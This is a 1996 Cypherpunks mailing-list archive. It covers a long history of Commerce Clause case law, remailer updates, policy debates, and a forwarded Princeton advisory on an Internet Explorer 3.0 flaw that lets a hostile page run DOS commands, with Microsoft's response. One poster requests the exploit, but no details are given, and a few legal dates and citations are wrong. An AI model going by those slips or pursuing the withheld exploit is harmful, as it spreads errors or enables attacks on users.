> is justifed, constitutionally, by the clause in the U.S. Constitution which
> says Congress shall have the power to regulate commerce. (More precisely,
> the clause says: "To regulate commerce with foreign nations, and among the
> several states, and with the Indian tribes;" This is usually interpreted to
> mean _interstate_ commerce, and not sales/commerce/etc. that do not
> centrally involved more than one state....obviously nearly all things sold
> in one state are sold in other states, so there is lattitude for applying
> the commerce clause, albeit wrongly.)
> 
> Today's news is the sweeping new restrictions on tobacco and cigarettes,
> including restriction on advertising and even on the placement of tobacco
> and cigarette logos and names on sports jerseys and shirts.

[...]

> The catch-all for these laws seems to be the "regulate commerce" language
> in the Constitution. Cigarettes are sold in multiple states, the logic
> goes, so the commerce clause gives the government the power/authority to
> regulate it.
> 
> (Well, Steven King novels are sold in all 50 states, too. Does this
> "regulate commerce" clause give the government the power/authority to
> regulate what King puts in his novels? Or to ban advertising for Steven
> King novels? Or to require that stores only sell such novels to adults?)
> 
> This language is already being cited for some as a justification for
> regulating encryption (hey, some businesses use it!), digital signatures
> (ditto), and other forms of crypto.
> 
> In fact, since nearly everything involves "commerce" in some way, whether
> interstate or not, the "regulate commerce" clause can presumably be used as
> a jusitification for interfering in all sorts of areas.
> 
> The several legal experts out there on this list can clarify any errors of
> interpretation I have made. I certainly know that the commerce clause
> cannot be used to suppress certain kinds of speech, though the boundaries
> of where it may be applied seem unclear.

Mr. May is fairly close.  If the commerce clause can not be used to
suppress speech it is because there is a constitutional amendment
protecting it.

Practically speaking, the commerce clause is boundless in its grant.

The evolution of Commerce Clause use is one of the most interesting
examples of creeping statism in a western nation that I know of.

Consider the classic view of the Commerce Clause a la Gibbons v. Ogden, 22
U.S. 1 (1824).

[Robert Fulton and Robert Livingston were granted exclusive rights to
operate steamboats in New York waters by the New York Legislature.
Steamboats were a new technology, and the legislation was intended to
encourage investment in the boats.  Fulton and Livingston licensed Ogden
to run a ferry service to New Jersey and Gibbons began to compete.
Gibbon's's ferries were licensed as "vessels in the coasting trade" under
a 1793 piece of legislation enacted by Congress.  Ogden obtained an
injunction in New York, Gibbons appealed.]

Chief Justic Marshall for the majority:

"The subject to be regulated is commerce, and our constitution being, as
was aptly said at the bar, one of enumeration, and not of definition, to
ascertain the extent of the power, it becomes necessary to settle the
meaning of the word.  The counsel for the appellee would limit it to
traffic, to buying and selling, or the interchange of commodities, and do
not admit that it comprehends navigation.  This would restrict a general
term, applicable to many objects, to one of its significations.  Commerce,
undoubtledly, is traffic, but it is something more: it is intercourse.  It
describes the commercial intercourse between nations, and parts of
nations, in all its branches, and is regulated by prescribing rules for
carrying on that intercourse.  The mind can scarcely conceive a system
for regulating navigation, which shall exclude all laws concerning
navigation... and be confined to prescribing rules for the conduct of
individuals, in the actual employment of buying and selling or of
barter....

It is not intended to say that these words comprehend that commerce,
which is completely internal, which is carried on between man and man in a
state, or between different parts of the same states, and which does not
extend to or affect other states. [sic]  Such a power would be
inconvenient, and is certainly unnecessary.

Comprehensive as the word 'among' is, it may very properly be restricted
to that commerce which concerns more states than one.  The phrase is not
one which would probably have been selected to indicate the completely
interior traffic of a state, because it is not an apt phrase for that
purpose...."

Justice Johnson:

[Who discusses the history of the state powers over commerce where states
were complete sovereigns and the portion of that power which is delegated
to the federal government.]

[A]n absolute control is given over state legislation on [commerce], as
far as that legislation may be exercised, so as to affect the commerce of
the country.

::::

So as it stands in the day, commerce seems to include buying selling
bartering and transporting good or services between states.  It is the
interaction between states which defines commerce, and the authority to
regulate it stems from the need to prevent one state from "affect[ing] the
commerce of the country."

This is the classic, and (in my view) fairly rational analysis of the
commerce clause.

Use of the commerce clause before the nineteenth century to actually
regulate interstate commerce was limited.  Insteaed Congress concentrated
on programs and legislation to promote economic growth, taking steps, for
example, to create the Bank of the Unted States, transfer public lands to
private citizens, and providing for the national defense.

Some authors note that the aftermath of the Civil war created many of the
circumstances which made a more expansive view of the commerce clause
appealing.  For example, it is argued, the increasing success of the
national economy made it more obviously interdependent and that localized
problems increasingly became national problems.  One might consider the
period of Reconstruction, where the rights of newly freed slaves were not
adequately protected by southern state governments.  The case for national
intervention was fairly compelling in this example.  Theories of
federalism began to emerge which expanded the role of the federal
government and balloned the catagories of issues which fell into the
definition of "nationally impacting."  Many theorists use the Civil War
itself as a vindicating example of the concept that national power could
be used to "enforce" freedom.  (For larger views of these theories and the
historical context often used to support them, See Generally, H. Hyman, A
More Perfect Union (1973); R. Harrison, The Weakened Spring of Government
Revisited: The Growth of Federal Power in the Late Nineteenth Century, in
The Growth of Federal Power in American History (R. Jeffreys-Jones & B.
Collins eds. 1983).

Some of the period's legislation reflects the new attitude, the
Interstate Commerce Act of 1887 and the Sherman Antitrust act of 1880 are
classic examples.  These more active measures of regulation did, however,
produce a growing group of citizens sensitive to the growing national
powers.  Many commentators note that the groups objecting to national
legislation could provide very concrete examples why the congressional
acts hampered freedom and economic growth, while proponents of the acts
were limited to untested concepts of national economy, and theory.

Federalist based objections to these legislative inititives forced the
development of legal theories to address the concrete examples.  Note that
this period also began the currently obvious trend of promoting social
goals viewed "as valuable wholly apart from their relation to economic
development."

These approaches are generally lumped into the "formal" and "realist"
realms.  Consider first, United States v. E.C. Knight Co., 156 U.S. 1
(1895):

[The United States used the Sherman Act to set aside the acquisition by
the American Sugar Refining Company of four competing refineries.  The
aquisition left only one independent refinery in operation which produced
2 percent of the sugar refined in the country.  Chief Justice Fuller held
that the Sherman Act did not reach this monopoly because the Constitution
did not allow Congress to regulate "manufacturing."  The government had
argued that such concentrated manufacturing power constituted a monopoly
over a necessity of life which was enjoyed by a large population of the
United States which necessarily required resort to interstate commerce.

Fuller replied that "this argument cannot be confied to necessaries of
life merely, and must include all articles of general consumption.
Doubtless the power to control the manufacture of a given thing involves
in a certain sense the control of its disposition, but this is a
secondary and not the primary sense; and although the exercise of that
power may result in bringing the operation of commerce into play, it does
not control it, and affects it only incidently and indirectly.  Commerce
succeeds manufacture, and is not a part of it.

In Fuller's view, it would be "far-reaching" to permit a federal action
"whenever interstate or international commerce may be ultimately affected.
The fact that an article is manufactured for export to another state does
not of itself make it an article of interstate commerce, and the intent of
the manufacturer does not determine the time when the article or product
passes from the control of the state and belongs to commerce."  Fuller
continued, noting that a monopoly in manufacture might restrain interstate
commerce but that this was an indirect result and therefore American
Sugar's action "bore no relation" to interstate commerce.

Justice Harlan dissented, arguing that a monopoly that "obstructs freedom
in buying and selling articles" to be sold outside of the state of
manufacture "affects, not incidently, but directly, the people of all the
States."  In Harlan's view, "Whatever improperly obstructs the free course
of interstate intercourse and trade, as involved in the buying and selling
of articles to be carried from one state to another, may be reached by
congress."  To Harlan congress was merely, "prevent[ing] the coming into
existence of combination, the purpose or tendency of which was to impose
unlawful restraints upon interstate commerce."

E.C. Knight Co. through Fuller, demonstrates nicely the "formal" view.
The line of interstate commerce is drawn quite finely.  Indirect effects
are ignored.

The realist view, as expressed by Harlan, looks instead to the effect on
economy, the actual impact, or the intent of congress.

Concepts like the "stream of commerce" (Congress may regulate an activity
if it affects interstate commerce.  Taft in Stafford v. Wallace, 258 U.S.
495 (1922)., and the "current of commerce" (Swift and Co. v. United
States 196 U.S. 375 (1905)), began to form to facilitate the expansion of
the reach of the commerce clause in the early 1900s.

The court was a bit muddled about its approaches from the 1890's or so
until the 1920's but the result was a great deal of flexibility in
assessing the constitutionality of congressional statutes by the time the
1930's arrived.

In 1933 Franklin D. Roosevelt took office.  Addressing the crippled
economy, the new president fostered a host of legislation, unprecidented
in number and power.  Enter: The New Deal.

Consider the comments of one scholar: "Much of the legislation interfered
with what many had come to regard as the prerogatives of private property,
and, incidently, the proper domain of the states.  The New Deal statutes
were sure to generate challenges to their constitutionality.  Supporters
could draw on a complex, well-developed, and not entirely coherent body of
law regarding the extent of Congress's power to regulate interstate
commerce."

Some of the first challenges arrived in the mid 1930's in the form of
Nebbia v. New York, 291 U.S. 502 (1934); Norman v. Baltimore and Ohio
Railroad, 294 U.S. 240 (1935) (upholding the repudiation of contractual
duties to repay debts in gold) and Panama Refining Co. v. Ryan, 293 U.S.
388 (1935).  Only Panama Refining succeeded as a challenge to legislation,
invalidating portions of the National Industrial Recovery Act of 1933
which some commentators consider the conceptual centerpiece of the New
Deal.

More blows to the New Deal followed in the form of A. L. A. Schecter
Poultry Corp v. United States 295 U.S. 495 (1935); Carter v. Carter Coal
Co., 298 U.S. 238 (1936).

At the time of the Schecter decision, the act in question was about to
expire, and the administrative approach to its enforcement was becoming
less and less popular.  Schecter was, therefore, probably more important
for its approach than its actual result.  Consider Justice Hughes, for the
majority:

"The undisputed facts thus afford no warrant for the argument that the
poultry handled by defendants at their slaughterhouse markets was in a
'current' or 'flow' of interstate commerce and was thus subject to
congressional regulation.  The mere fact that there may be a constant flow
of commodities into a states does not mean that the flow continues after
the property has arrived and has become commingled with the mass of
property within the state and is there held solely for local dispotion and
use.

[...]

"If the commerce clause were construed to reach all enterprises and
transactions which could be said to have an indirect effect uipon
interstate commerce, the federal authority would embrace practically all
the activites of the people and the authority of the state over its
domestic concerns would exist only by sufference of the federal
government.  Indeed, on such a thoery, even the development of the
state's commercial facilities would be subject to federal control.

"If the federal government may determine the wages and hours of employees
in the internal commerce of a state, because of their relation to cost and
prices and their indirect effect upon interstate commerce, it would seem
that a similar control might be exerted over other elements of costs, also
affecting prices, such as the processes of production and distribution
that enter into cost could likewise be controlled.  If the cost of doing
an intrastate business is in itself the permitted object of federal
control, the extent of the regulation of cost would be a question of
discretion and not of power."

::::

So we find the court rejecting a strictly "realist" approach and guarding
certain "wholly local" activites from the reach of congression regulation
by insisting on a "formalist" reading.

One may note the attitude of the majority in Carter as demonstrative of
the protectiveness the court was showing toward local activity.  Consider
Justice Sutherland for the majority:

"Every journey to a forbidden end begins with the first step and the
danger of such a step by the federal governmnet in the direction of taking
over the powers of the states is that end of the journey may find the
states so despoiled of their powers, or-- what may amount to the same
thing-- so relieved of the responsibilities which possession of the powers
necessarily enjoins, as to reduce them to little more than geographical
subdivisions of the national domain."

::::

These cases, along with United States v. Butler, 297 U.S. 1 (1936);
Morehead v. New York ex rel Tipaldo, 298 U.S. 587 (1936), and the
landslide victory by FDR hatched a cunning plan.  Thwarted by the Supreme
Court in serious ways, FDR proposed certain "changes" in the structure of
the court.  Essentially Roosevelt proposed that one justice be added for
each justice over 70 who refused to resign or retire.  This would bring
the number of justices up to fifteen, and secure a safe majority on the 
court for the New Deal supporters.

The rational was the the older justices were increasing the workload on
the younger justices because they were unable to properly see to their
duties.

During debate on the proposal Justice Van Devanter left the Court and the
Court upheld a state minimum wage state in West Coast Hotel Co. v.
Parrish, 200 U.S. 379 (1937).  Justice Roberts, formerly a New Deal
opponent had switched his vote in West Coast.  This last minute alteration
was dubbed "The switch in time that saved Nine."

It should also be noted that the majority leader of the Senate, Joseph
Robinson, exerted a great deal of pressure on the Senate and personal
pressure on individual Senators and was believed by many to have
accumulated the required votes for the court packing plan.  Robinson died
of a heart attack however before the vote was taken and the plan was
rejected.  Personally, I am amazed that conspiracy buffs have not latched
on to this piece of history.  See Generally, Leuchtenberg, The Origins of
Franklin D. Roosevelt's Court Packing Plan, 1966 Sup. Ct. Rev 347.

One might also want to take into account the increasing power communists
were showing in the United States.  Several commentators have pointed out
that without the "concessions" of The New Deal, the United States might
well have faced a sudden and potent turn to socialism or communism

The result, however, was a suddenly pro-New-Deal court.  Witness Justice
Hughes in NLRB v. Jones and Laughlin Steel Corp., 301 U.S. 1 (1937):

"Although activites may be intrastate in character when separtely
considered, if they have such a close and substantial relation to
interstate commerce that their control is essential or appropriate to
protect that commerce from burdens and obstructions, Congress cannot be
denied the power to exercise that control."

::::

and the outer limits of the commerce clause:

Wickard v. Filburn, 317 U.S. 111 (1942)

[The Agricultural Adjustment Act allowed the Secretary of Agriculture to
set a quota for wheat production.  Each wheat grower was given an
allotment.  Filburn was a dary farm owner in Ohio.  He also raised small
amounts of wheat for his livestock and for making flower at home, for seed
purposes, and for sale.  His quota was 222 bushels, but he instead yielded
461 and was fined $117.  Fulburn sued to enjoin enforcement arguing,
among other issues, that his entiely local use and consumption of wheat
for his own family use was beyond the reach of Congressional Legislation.]

Justice Jackson:

"The Court's recognition of the relevance of the economic effects in the
application of the Commerce Clause has made the mechanical application of
legal formulas no longer feasible.  Once the economic measure of the reach
of the power granted to Congress in the commerce clause is accepted,
questions of federal power cannot be decided simply by finding the
activity in question to be "production," nor can consideration of the
economic effects be foreclosed by calling them "indirect"...

...even if appellee's activity be local and though it may not be regarded
as commerce, it may still, whatever its nature, be reached by congress if
it exerts a substantial economic effect on interstate commerce and this
irrespective of whether such effect is what might at some earlier time
have been defined as "direct" or "indirect..."

That appelee's own contribution to the demand for wheat may be trivial by
itself is not enough to remove him from the scope of federal regulation
where, as here, his contribution taken together with that of many others
similarly situated, is far from trivial."

::::

Now we see the extreme edges of the commerce clause.  Even individual
acts, which alone are not sufficent to impact interstate commerce, may in
their aggregate be seen to impact it.  Congress thus can reach the most
local acts.

As a result, the commerce clause has become a quick and easy clause to
rely upon when congress is attempting to impose its rule over what may
appear to be "local activities."  Civil rights legislation rested on the
commerce clause as its authority, typically by arguing that privately
owned estlablishments affected interstate commerce by e.g., their
proximity to an interstate and the interstate makeup of their clients.

It is worth noting that since the Wickard case, and until the year before
last, no challenge based on commerce clause authority has suceeded.  (The
only case I know of involves the regulation of firearms possession in
school zones and spurred some news stories last year).

> I do expect [the commerce clause] to be used for crypto, though, and
> this might even be upheld by the Supremes, especially in any areas
> directly involving "digital commerce."

Without a doubt.

> We should watch for this, and think about ways to deflect or derail such
> interpretations.

Extremely difficult.

As you can see, the commerce clause is deeply entrenched.  Direct and
indirect effects on commerce between the states are easily enough to reach
the questioned activity.

I think there is no doubt in the world that digital commerce will DIRECTLY
impact interstate and foreign commerce from a legal point of view.  If my
growing wheat in my back yard does, you can bet the farm that new means of
conducting business and making transactions across state boarders will.

I hate to differ with Mr. May, but I think that deflecting or derailing
this aspect of congressional authority to regulate is all but hopeless in
light of cases like Wickard and that our efforts are best directed
elsewhere.

Now I know some list member will mail me asking how I can support the
crushing grip congress has on the citizens of the United States and the
States themselves.  I do hope that member will re-read my post carefully
before pecking out that letter.

I believe the answer to preserving the purity of digital commerce is to
form it in such a way so as to make regulation impossible, because in my
view the constitution no longer provides citizens with the protection or
freedom to progress.  I feel the same way about privacy.  All the
constitutional arguments in the world mean little today.  A systematic
approach which makes violations of personal rights impossible whether
constitutional or not is the answer.

I see digital commerce burdened by regulations possessed of the character
of money laundering, reporting requirements and due dilligence statutes.
All of these are already entrenched, and there is literally ZERO chance of
prevailing in a challenge based on the illegitimacy of the commerce clause
in these cases.

("The cash is dead, long live the king.")

Cypherpunks should do what cypherpunks do best.  Write code, implement big
brother proof systems and make them entrenched before they are legislated
away.  There are always creative ways to make laws which take away rights.
You can't, however, legislate away mathamatics.

> --Tim May

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 27 Aug 1996 12:08:30 +0800
To: ncognito@gate.net (Ben Holiday)
Subject: Re: Microsoft Explorer security hole (fwd)
In-Reply-To: <Pine.A32.3.93.960826001930.31882A-100000@seminole.gate.net>
Message-ID: <199608262206.RAA03891@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


please publish the exploit.

many many thanks in advance

igor

Ben Holiday wrote:
> 
> 
> 
> ---------- Forwarded message ----------
> Date: Mon, 26 Aug 1996 01:35:07 GMT
> Subject: Microsoft Explorer security hole (fwd)
> 
> On Sun, 25 Aug 1996 13:55:30 -0600 (MDT), Carl Nation
> <carl@iserver.com> wrote:
> 
> To our Resellers/Customers,
> 
> Our sysadmin received this security alert, and we thought we should
> pass it along...
> 
> ------- Forwarded Message
> 
> Date: Wed, 21 Aug 1996 13:12:59 -0400
> From: felten@CS.Princeton.EDU (Ed Felten)
> Subject: Internet Explorer Security Problem
> 
> We have discovered a security flaw in the current version (3.0) of
> Microsoft's Internet Explorer browser running under Windows 95.  An
> attacker could exploit the flaw to run any DOS command on the machine of
> an Explorer user who visits the attacker's page.  For example, the
> attacker could read, modify, or delete the victim's files, or insert a
> virus or backdoor entrance into the victim's machine.  We have verified
> our discovery by creating a Web page that deletes a file on the machine of
> any Explorer user who visits the page.
> 
> The core of the attack is a technique for delivering a document to the
> victim's browser while bypassing the security checks that would
> normally be applied to the document.  If the document is, for example, a
> Microsoft Word template, it could contain a macro that executes any DOS
> command.
> 
> Normally, before Explorer downloads a dangerous file like a Word
> document, it displays a dialog box warning that the file might contain a
> virus or other dangerous content, and asking the user whether to abort the
> download or to proceed with the download anyway.  This gives the user a
> chance to avoid the risk of a malicious document.  However, our technique
> allows an attacker to deliver a document without triggering the dialog
> box.
> 
> Microsoft has been notified and they are working on fixing the
> problem. Until a remedy is widely available, we will not disclose further
> details about the flaw.
> 
> For more information, contact Ed Felten at felten@cs.princeton.edu or
> 609-258-5906.
> 
> Dirk Balfanz and Ed Felten
> Dept. of Computer Science, Princeton University
> http://www.cs.princeton.edu/sip/
> 
> ------- End of Forwarded Message
> 
> 
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 27 Aug 1996 11:24:10 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Credit enforcement
Message-ID: <199608270039.RAA20498@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:43 PM 8/17/96 -0400, you wrote:
>I thought that classical libertarians agree that the enforcement of 
>contracts is a proper function of the government.

The minarchists generally do, the anarchists generally don't,
at least if you're talking about last-resort contract enforcement.
The primary mechanisms always have been to use the market,
whether through reputations, insurance companies, bonding agencies,
boycotts, or (often the most powerful) the sheer value of repeat business.
Much of the development of commercial law from the Romans
through the Middle Ages been to find peaceful and efficient ways
to do business without the King helping.

There are historical alternatives to having government do it;
the Irish, Icelandic, Somali, and American Arbitration Association
non-state-based justice systems had/have various sets of social pressure
to do the job.  (For instance, Somali dispute resolutions usually end up
with some number of cows or other money getting paid to a winning 
plaintiff, and if you don't pay, your extended family has to.
Rarely, the family also refuses and bringing in a higher-reputation
judge fails, and a brief feud ensues...)

On the "should the government or the free market do this" scale,
most people put last-resort contract enforcement at the
"we don't mind too much if the government does it" end
rather than the "overthrow the government if they even think
about touching it" end, which is for issues like sex, drugs, rock&roll,
freedom to travel, etc.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Tue, 27 Aug 1996 09:39:02 +0800
To: alt.privacy.anon-server@news.news.demon.net
Subject: New type2.list/pubring.mix
Message-ID: <199608262251.RAA01261@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	There is a new type2.list/pubring.mix update for Mixmaster on
jpunix.com. The update reflects the temporary retirement of the anon
Mixmaster remailer. Please update your files accordingly. The files
can be obtained by WWW at www.jpunix.com and by anonymous FTP at
ftp.jpunix.com.

- -- 
 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMiIqVlOTpEThrthvAQE4QwQAhFWK/mkfi7ucQq4xdnRJKiezeVr7tuT6
j0RYV+mnmiBjYX7jMtsEA4dSuEoTqG0IzXtihbu91qNk7mTyNfNmIegyIDfneD4M
bJh3jpUK6d2zHJ8Bo8+dwVd6e+etZZ+0+CC9AULfuWC0AKUpkoF5ussjWf2L8thB
WuSJQTT72UM=
=DcDL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kelly Cunningham" <deviate@lipschitz.sfasu.edu>
Date: Tue, 27 Aug 1996 11:52:04 +0800
To: John Perry <perry@alpha.jpunix.com>
Subject: Re: New type2.list/pubring.mix
In-Reply-To: <199608262251.RAA01261@alpha.jpunix.com>
Message-ID: <Pine.NXT.3.93.960826180857.3357A-100000@lipschitz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 26 Aug 1996, John Perry wrote:
 
jp> Hello Everyone,
jp> 
jp> 	There is a new type2.list/pubring.mix update for Mixmaster on
jp> jpunix.com. The update reflects the temporary retirement of the anon
jp> Mixmaster remailer. Please update your files accordingly. The files
jp> can be obtained by WWW at www.jpunix.com and by anonymous FTP at
jp> ftp.jpunix.com.
jp> 

I notice that there is an entry for treehole:

 treehole treehole@mockingbird.alias.net 2c9f098377bf4f068751683f803834f5 2.0.3

Is it back?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp2.b, a Pine/PGP interface.

iQCVAwUBMiHo2+Bu0383Om6dAQGyPAP+LeLbvQKL74t35BovqZcGA7ELWasUEA71
DJfLKWApg700lgGN4PQ8+puYIFxuHzN2oa0mksFUkl3uINXgY3C8KnWBVMuEwHKO
m2IQjf5kX9MIeZ9DNEyXgb0FYfc4ohK4632gdZIkTeKVfcdRY/CZFc6UU1eRmUnS
RVNZADo9OZc=
=aj3h
-----END PGP SIGNATURE-----


-- kc    finger deviate@lipschitz.sfasu.edu | pgp -fka    49860926614586AF
"The  strongest reason for the people to retain  their    54105BA338FBF0FB
right  to  keep  and  bear  arms is, as a last resort,
to protect themselves against tyranny in  government." -- Thomas Jefferson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 27 Aug 1996 14:08:09 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
In-Reply-To: <199608262107.OAA16648@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.91.960826183426.26136A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Just to clarify, Jonah Seiger wrote the "Go a head and reject" lines 
below and I wrote the now thrice-nested "Worse yet, as recently" lines.

My response to Jonah is forthcoming.

-Declan


On Mon, 26 Aug 1996, James A. Donald wrote:

> At 09:50 AM 8/26/96 -0700, Declan McCullagh wrote:
> > Go a head and reject the "Beltway politicians". It's fashionable, sure, but
> > what does it really accomplish?  Some of them are dangerous. Others are
> > sympathetic. 
> 
> Not true, some of them are merely less dangerous and harmful than others.
> 
> As to whether Leahy is one of the less dangerous and harmful ones, that
> is seriously questionable.
> 
> > The fact is that short of armed rebellion they are going to be
> > here for a while.I shudder to think of the wrath our opponents 
> > could wage if we all threw up our hands packed up our bags and left town.
> 
> Bad cop, good cop.  You cooperate with the "good" cop, you go to jail.  You
> tell them both to go to hell, then maybe you will not go to jail, and if you
> do go to jail, at least you will have the satisfaction of screaming injustice
> all the way:
> 
> Re read what our "good" cop has been up to:
> 
> > > Worse yet, as recently as this month Leahy has
> > > been clamoring to fund the invasive wiretapping legislation ("Digital
> > > Telephony") he shepherded through Congress two years ago.
> > >
> > > Equally distressingly, Leahy demonstrated his "impeccable cyberspace
> > > credentials" by cosponsoring the Senate online copyright bill -- aka the
> > > Hollywood Media Mafia's wet dream. (Yes, these are the same rapacious
> > > folks who are demanding that the Boy Scouts and summer camps pay cash to
> > > sing "God Bless America" and "Puff the Magic Dragon.") Opposed by the
> > > American Library Association, EFF, and teachers' organizations, Leahy's
> > > bill would slam fair use rights online and could make it a crime to
> > > browse the Net without a license.
>  ---------------------------------------------------------------------
>               				|  
> We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> and our property, because of the kind	|  
> of animals that we are. True law	|   James A. Donald
> derives from this right, not from the	|  
> arbitrary power of the state.		|   jamesd@echeque.com
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bf578@scn.org (SCN User)
Date: Tue, 27 Aug 1996 17:21:53 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft Explorer security hole (fwd) MSoft's reply...
Message-ID: <199608270144.SAA18367@scn.org>
MIME-Version: 1.0
Content-Type: text/plain




Date: Thu, 22 Aug 1996 15:49:33 -0700
From: Thomas Reardon <thomasre@MICROSOFT.com>
Subject: Re: Internet Explorer security problem (Felten, RISKS-18.36)
 
  >We have discovered a security flaw in the current version (3.0) of
  >Microsoft's Internet Explorer browser running under Windows 95.  An
  >attacker could exploit the flaw to run any DOS command on the machine 
  >of an Explorer user who visits the attacker's page.
 
We now post the virus warning dialog on local files (file: urls).  We have
always posted it on remote files (http: urls).  Note that the root of the
problem is not Java or the browser, but in macro-enabled applications.  IE3
has a mechanism to warn users about safety of documents when used with
common macro-enabled applications.  We are have updated Microsoft Word such
that by default it will not run macros embedded in documents.
 
-Thomas
 

>
>
>
>---------- Forwarded message ----------
>Date: Mon, 26 Aug 1996 01:35:07 GMT
>Subject: Microsoft Explorer security hole (fwd)
>
>On Sun, 25 Aug 1996 13:55:30 -0600 (MDT), Carl Nation
><carl@iserver.com> wrote:
>
>To our Resellers/Customers,
>
>Our sysadmin received this security alert, and we thought we should
>pass it along...
>
>------- Forwarded Message
>
>Date: Wed, 21 Aug 1996 13:12:59 -0400
>From: felten@CS.Princeton.EDU (Ed Felten)
>Subject: Internet Explorer Security Problem
>
>We have discovered a security flaw in the current version (3.0) of
>Microsoft's Internet Explorer browser running under Windows 95.  An
>attacker could exploit the flaw to run any DOS command on the machine of
>an Explorer user who visits the attacker's page.  For example, the
>attacker could read, modify, or delete the victim's files, or insert a
>virus or backdoor entrance into the victim's machine.  We have verified
>our discovery by creating a Web page that deletes a file on the machine of
>any Explorer user who visits the page.
>
>The core of the attack is a technique for delivering a document to the
>victim's browser while bypassing the security checks that would
>normally be applied to the document.  If the document is, for example, a
>Microsoft Word template, it could contain a macro that executes any DOS
>command.
>
>Normally, before Explorer downloads a dangerous file like a Word
>document, it displays a dialog box warning that the file might contain a
>virus or other dangerous content, and asking the user whether to abort the
>download or to proceed with the download anyway.  This gives the user a
>chance to avoid the risk of a malicious document.  However, our technique
>allows an attacker to deliver a document without triggering the dialog
>box.
>
>Microsoft has been notified and they are working on fixing the
>problem. Until a remedy is widely available, we will not disclose further
>details about the flaw.
>
>For more information, contact Ed Felten at felten@cs.princeton.edu or
>609-258-5906.
>
>Dirk Balfanz and Ed Felten
>Dept. of Computer Science, Princeton University
>http://www.cs.princeton.edu/sip/
>
>------- End of Forwarded Message
>
>
>
>
>



--
------------------------------------------
There are no facts, only interpretations.

I always wanted to be somebody, 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Geoffrey Gussis <geoff@digidem.com>
Date: Tue, 27 Aug 1996 11:26:48 +0800
To: cypherpunks@toad.com
Subject: Whistleblowing on the Internet
Message-ID: <v03007802ae47e8a83d6d@[128.252.112.220]>
MIME-Version: 1.0
Content-Type: text/plain


I'm writing a paper for my ethics class on Whistleblowing, and specifically
how it has been aided by the Internet.  If anyone knows of any resources,
pointers, etc., I would greatly appreciate it.  The results will be
published on-line, and I can send a copy to anyone who is interested as
well.  I am interested in information covering both the private sector and
the government as well.  I do know that the Federal Government has an
online BBS where you can send in information on fraud, etc.

What I have uncovered so far:

+ As far as a Lexis/Nexis search goes, I only found a few articles, and
they centered around the Tobacco Papers, and the Scientology debate.

+ I located the Whistleblowing FAQ and contacted its author, but its last
update was in 1994 and it is no longer being maitained.

+ I visited a couple of other related Internet sites (I searched using many
search engines), but they don't really have examples of using the Internet
for whistleblowing purposes.

+ I am also aware of the majority of Anonymity/Privacy sites on the
Internet, and will definitely be utilizing them in the paper.


Overall, I am quite surprised that there isn't a whistleblowing
clearinghouse on the Internet; a site sponsored by a non-profit that lists
email addresses and secure forms for sending anonymized email to those
areas of the public and private sector that deal with whistleblowing.  As
the Internet is a great medium for information dissemination, and offers
significant privacy advantages, I really expected to find much more.

Is anyone else working in this area?  Any help would be greatly appreciated.

Cheers,

Geoffrey Gussis
2L - Washington University School of Law

___________________________________________________________________
Internet Law Projects at http://www.digidem.com/legal/

+ Worldwide Top-Level Domain/Trademark Dispute Resolution Policies

+ Businesses on the Internet (BOTI) Legal Research Initiative

+ Legal Links in Electronic Commerce and Interactive Entertainment






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 27 Aug 1996 14:01:06 +0800
To: cypherpunks@toad.com
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
Message-ID: <Pine.SUN.3.91.960826190221.27037D-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Mon, 26 Aug 1996 18:52:40 -0700 (PDT)
From: Declan McCullagh <declan@eff.org>
To: Jonah Seiger <jseiger@cdt.org>
Cc: shabbir@vtw.org, fight-censorship@vorlon.mit.edu, brock@well.com,
    telstar@wired.com
Subject: Re: INFO: Democratic convention chats online! Be there! (8/25/96)

Jonah,

I had expected some negative feedback from CDT, but I should say I was
surprised by the tenor of your response. 

Unfortunately, you don't address the substance of my criticisms of Leahy:
how can you defend Leahy's avowed support for Digital Telephony and the
copyright legislation? How do his actions make him a "forceful" and
"consistent advocate" with "impeccable cyberspace credentials?" 

(Hint: They don't. He isn't.)

You write that: "Of course we are not going to agree with our friends on
every issue." But I disagree with your underlying assumption; if a senator
is our "friend," they won't do what Leahy does. Being familiar with
technology does not a Net-advocate make -- take Al Gore, for instance, who
net-surfs in an Old Executive Office building cluster... 

If I'm wearing any hat at all right now, it's my cypherpunk one. And that
